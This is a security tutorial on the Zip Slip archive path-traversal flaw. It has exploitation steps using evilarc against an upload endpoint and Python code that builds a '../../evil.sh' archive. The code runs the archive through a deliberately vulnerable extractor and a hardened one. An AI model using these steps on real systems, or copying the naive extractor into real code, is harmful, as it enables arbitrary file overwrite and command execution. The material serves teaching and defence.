As per snyk.io: Zip Slip is a widespread arbitrary file overwrite vulnerability (rated critical) that typically results in remote command execution. It is exploited using a specially crafted archive that holds directory-traversal filenames (e.g. ../../evil.sh); when the application extracts such an archive without validating entry names, the file is written outside the intended extraction directory. Zip Slip is not limited to zip: it affects any archive format whose entries carry a path, including tar, jar, war, cpio, apk, rar and 7z.
How to Exploit?
- Using the following tool, create a malicious archive whose entry name contains a traversal sequence (e.g. ../../evil.sh): https://github.com/ptoomey3/evilarc
- Upload the malicious archive through the application's archive upload functionality. Note that the bug only triggers if the server actually extracts the archive; an upload that is merely stored does nothing.
- If it is accepted and extracted successfully, check for endpoints that reflect the result of the uploaded file (for example a file dropped into the web root), or look for any unintended behavior from the server/application for further exploitation. The traversal depth and target filename have to match the server's layout, so expect to try several depths and paths.
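The following is an added example, not code from the original page or from evilarc. It builds a Zip Slip archive the same way evilarc does (a single entry named ../../evil.sh, written with Python's zipfile so the traversal is preserved), then runs it through a deliberately naive extractor that joins the entry name onto the destination directory, and through a hardened extractor that canonicalises every target path and refuses anything outside the destination. The directory layout (<root>/www/uploads as the intended extraction directory) and the payload are constructed for the example.

```python
import io
import os
import shutil
import tempfile
import zipfile


def build_zipslip_archive(depth: int = 2, filename: str = "evil.sh",
                          payload: bytes = b"#!/bin/sh\necho pwned\n") -> bytes:
    """Return the bytes of a zip whose single entry carries a traversal name.

    This mirrors what evilarc produces: the entry name is e.g. '../../evil.sh'.
    zipfile.writestr() does not normalise the name, so the '../' survives.
    """
    traversal_name = "../" * depth + filename
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(traversal_name, payload)
    return buf.getvalue()


def vulnerable_extract(archive: bytes, dest: str) -> list:
    """Naive extractor: joins the entry name onto dest without validation.

    This is exactly the pattern Zip Slip exploits. Note that ZipFile.extract()
    would strip the '..' components; hand-rolled extraction like this does not.
    Returns the canonical paths that were actually written.
    """
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest, info.filename)   # '../' is honoured here
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(os.path.realpath(target))
    return written


def safe_extract(archive: bytes, dest: str) -> list:
    """Hardened extractor: canonicalise each target and refuse escapes.

    realpath() resolves '..', absolute names and symlinks before the check, so
    an entry that would land outside dest raises instead of being written.
    """
    dest_real = os.path.realpath(dest)
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            if os.path.commonpath([dest_real, target]) != dest_real:
                raise ValueError(f"Zip Slip attempt blocked: {info.filename!r}")
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written


def demo() -> dict:
    """Run both extractors against a constructed Zip Slip archive.

    Constructed layout:  <root>/www/uploads/  is the intended extraction dir.
    With depth=2 the entry '../../evil.sh' resolves to <root>/evil.sh.
    """
    root = os.path.realpath(tempfile.mkdtemp(prefix="zipslip-demo-"))
    uploads = os.path.join(root, "www", "uploads")
    os.makedirs(uploads)
    archive = build_zipslip_archive(depth=2)

    written = vulnerable_extract(archive, uploads)
    outside = [p for p in written
               if os.path.commonpath([uploads, p]) != uploads]

    try:
        safe_extract(archive, uploads)
        blocked = False
    except ValueError:
        blocked = True

    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        entry_name = zf.namelist()[0]

    shutil.rmtree(root, ignore_errors=True)
    return {
        "entry_name": entry_name,
        "vulnerable_wrote_outside": [os.path.relpath(p, root) for p in outside],
        "safe_blocked": blocked,
    }


if __name__ == "__main__":
    print(demo())
```

Running `demo()` shows the naive extractor writing evil.sh two levels above the uploads directory while the hardened one raises before touching the disk. The same check catches absolute entry names, since os.path.join discards dest when the entry starts with "/" and realpath then lands outside dest_real. The check is per entry, so an archive mixing harmless and traversal entries is still rejected at the first bad one.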
Interesting Research Read:
- https://snyk.io/research/zip-slip-vulnerability
- https://github.com/snyk/zip-slip-vulnerability
